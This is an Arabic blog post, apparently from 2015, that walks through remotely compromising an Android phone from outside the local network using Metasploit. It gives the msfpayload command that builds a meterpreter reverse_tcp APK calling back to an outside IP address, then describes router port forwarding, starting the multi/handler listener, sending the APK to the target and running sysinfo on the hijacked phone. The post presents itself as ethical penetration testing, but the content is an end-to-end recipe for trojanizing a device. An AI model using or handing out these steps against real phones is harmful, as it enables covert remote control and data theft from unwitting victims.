اختراق الاندرويد عن بعد – من خارج الشبكة hack android الرجل الالكتروني اليمنيالرجل الالكتروني اليمني

اختراق الاندرويد عن بعد – من خارج الشبكة hack android

الخميس، 18 يونيو 2015
اختراق الاندرويد عن بعد – من خارج الشبكة hack android Hawk Yemen 5من 5
السلام عليكم سوف نشرح موضوع مهم الكثير يسئل عنه في اختبار الاختراق وهو >>>> اختراق الاندرويد عن بعد – من خارج الشب...

السلام عليكم
سوف نشرح موضوع مهم الكثير يسئل عنه في اختبار الاختراق وهو

>>>>

اختراق الاندرويد عن بعد – من خارج الشبكة

طبعاً الاختراق يتم عبر الميتاسبلويت وسوف نشرح فقط جزئية الاختراق الخارجي لن نتطرق الى التفاصيل لأنها موضوع اخر.
مع تنامي توسع نظام اندرويد على الهواتف كان ولا بد من تطوير ايضاً من ملفات لأختراقه وفحصة ايضاً.
الميتاسبلويت اضاف payload  خاص في اختراق الاندرويد ولكن الكثير سئلني عن الشرح السابق لأنه الطريقه ضعيفة لأن الشرح تم داخل الشبكة ولكن للأسف من يضع الاسئله ليس لديه معرفة كاملة عن الاختراق وكيف يتم الاتصال بين المهاجم والضحية . 
دعونا نبداء بالتطبيق اولاً الاختراق لا يختلف عن اختراق الاجهزه او المنصات الاخرى فقط الجديد هو
android/meterpreter/reverse_tcp
امر انشاء البايلود
msfpayload android/meterpreter/reverse_tcp lhost=131.117.163.30 LPORT=1234 R > Desktop/shaja.apk

1android-pentest

طبعاً نركز عنا في LHOST
مش لازم يعني تضع هنا الايبي الداخلي لجهازك في الشبكة ويعني الايبي الخاص بك الذي الضحية سوف يقوم الاتصال به .
هنا نضع الايبي الخارجي وتستطيع الحصول عليه من الروتر تبعك او بزيارة احد المواقع مثل
www.whatismyipaddress.com
2android-pentest
هنا النقطه الهامه في الانشاء
بعد صنع البايلود وأرسالة للهدف نبداء نستقبل الاتصال عبر
multi/handler 
نحن  وضعنا الايبي الخارجي كيف نستقبل الضحيه ويصل الى جهاز المخترق .
الامر يتم هنا مثل طريقة اختراق الاجهزه يتم فتح بورت للأيبي الخاص بجهاز المخترق الداخلي في الشبكة بالبورت الي تم تحديده اثناء صنع البايلود.
كما في الصورة فتح بورت داخل الشبكة وأعادة توجيه الاتصالات الى الايبي الخاص بجهاز المخترق
3android-pentest

طبعاً يتم جلب الايبي في الشبكة عبر الامر

ifconfig
فتحنا الان البورت لعنوان الايبي تبعنا ونبداء التنصت على البايلود الي انشأناه
4android-pentest
وندخل كما تحدثنا البورت والايبي الداخلي في التنصت وهنا النقطة في الاختراق الخارجي ما بين انشاء البايلود والتنصت
5android-pentest
نبداء بالامر run وونتظر حتى يتم الاتصال
وبعد الاتصال سوف تشاهد عنوان الايبي الخارجي الخاص بالضحية
6android-pentest

كما نلاحظ تم الاختراق بالايبي الخارجي .
والنظام المخترق اندوريد
نجلب المعلومة عبر الامر sysinfo
7android-pentest
نرجوا بأن تكون الفكرة قد وصلتكم.
الشرح مجرب من قبلي نايف صبره 
وتم شرح هذا من قبل 
عبدالسلام شاجع وهو خاص به 
ونقلته لأن شرحة مبسط وكامل بالطريقه الكتابيه المفهومه 
( الرجل الالكتروني اليمني )  


















هاكر اخلاقي اهتم في امن المعلومات بشكل كبير ولدي عده طرق لقياس خبرتي ومجال تعلمي في اختبار الاختراق وغيرها ولأن أمن المعلومات يعتبر مجال أمن المعلومات من أكثر المجالات حيوية في قطاع تقنية المعلومات. ويمكن تعريف أمن المعلومات بأنه العلم الذي يبحث في نظريات واستراتيجيات توفير الحماية للمعلومات من كل ما يهددها. ومن زاوية تقنية، هي الوسائل والادوات والاجراءات اللازم توفيرها لضمان حماية المعلومات من الاخطار الداخلية والخارجية. ، الرجل الالكتروني اليمني | نايف صبره

تعليقات ديسكس

هناك تعليق واحد:

Unknown يقول...

انتا من فين من اليمن ؟

4 يناير 2016 في 9:46 ص

إرسال تعليق

الاشتراك في: تعليقات الرسالة (Atom)